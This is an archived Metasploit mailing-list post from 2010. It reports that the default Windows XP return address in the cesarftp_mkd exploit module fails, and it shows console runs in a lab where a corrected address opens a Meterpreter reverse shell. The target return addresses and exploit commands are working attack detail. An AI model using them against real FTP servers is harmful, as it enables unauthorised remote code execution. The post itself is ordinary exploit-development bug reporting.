Metasploit mailing list archives

cesarftp_mkd default target XP SP2/SP3 doesn't work


From: One Time <onetime99 () ymail com>
Date: Mon, 22 Feb 2010 13:13:28 -0800 (PST)

In the cesarftp_mkd module the default targets are:

[ 'Windows 2000 Pro SP4 English', { 'Ret' => 0x77e14c29 } ],
[ 'Windows 2000 Pro SP4 French',  { 'Ret' => 0x775F29D0 } ],
[ 'Windows XP SP2/SP3 English',   { 'Ret' => 0x774699bf } ], # jmp esp, user32.dll
#[ 'Windows XP SP2 English',      { 'Ret' => 0x76b43ae0 } ], # jmp esp, winmm.dll
#[ 'Windows XP SP3 English',      { 'Ret' => 0x76b43adc } ], # jmp esp, winmm.dll
[ 'Windows 2003 SP1 English',     { 'Ret' => 0x76AA679b } ],

The exploit works only if I enable the commented-out target:
"#[ 'Windows XP SP2 English', { 'Ret' => 0x76b43ae0 } ], # jmp esp, winmm.dll"

---

The following is the result of a test run against Windows XP SP2 (English) with svn r8585 (2010.02.22) and target [ 'Windows XP SP2/SP3 English', { 'Ret' => 0x774699bf } ], # jmp esp, user32.dll:

msf > use exploit/windows/ftp/cesarftp_mkd
msf exploit(cesarftp_mkd) > set PAYLOAD windows/meterpreter/reverse_ord_tcp
PAYLOAD => windows/meterpreter/reverse_ord_tcp
msf exploit(cesarftp_mkd) > set TARGET 2
TARGET => 2
msf exploit(cesarftp_mkd) > set LHOST 192.168.159.131
LHOST => 192.168.159.131
msf exploit(cesarftp_mkd) > set RHOST 192.168.159.134
RHOST => 192.168.159.134
msf exploit(cesarftp_mkd) > exploit

[*] Started reverse handler on 192.168.159.131:4444
[*] Connecting to FTP server 192.168.159.134:21...
[*] Connected to target FTP server.
[*] Authenticating as anonymous with password mozilla@example.com...
[*] Sending password...
[*] Trying target Windows XP SP2/SP3 English...
[*] Exploit completed, but no session was created.
msf exploit(cesarftp_mkd) >

--

The following is the result of a test run against Windows XP SP2 (English) with svn r8585 (2010.02.22) and target [ 'Windows XP SP2 English', { 'Ret' => 0x76b43ae0 } ], # jmp esp, winmm.dll:

msf > use exploit/windows/ftp/cesarftp_mkd
msf exploit(cesarftp_mkd) > set PAYLOAD windows/meterpreter/reverse_ord_tcp
PAYLOAD => windows/meterpreter/reverse_ord_tcp
msf exploit(cesarftp_mkd) > set TARGET 3
TARGET => 3
msf exploit(cesarftp_mkd) > set LHOST 192.168.159.131
LHOST => 192.168.159.131
msf exploit(cesarftp_mkd) > set RHOST 192.168.159.134
RHOST => 192.168.159.134
msf exploit(cesarftp_mkd) > exploit

[*] Started reverse handler on 192.168.159.131:4444
[*] Connecting to FTP server 192.168.159.134:21...
[*] Connected to target FTP server.
[*] Authenticating as anonymous with password mozilla@example.com...
[*] Sending password...
[*] Trying target Windows XP SP2 English...
[*] Transmitting intermediate stager for over-sized stage...(216 bytes)
[*] Sending stage (747008 bytes)
[*] Meterpreter session 1 opened (192.168.159.131:4444 -> 192.168.159.134:1026)

meterpreter >

--

Regards.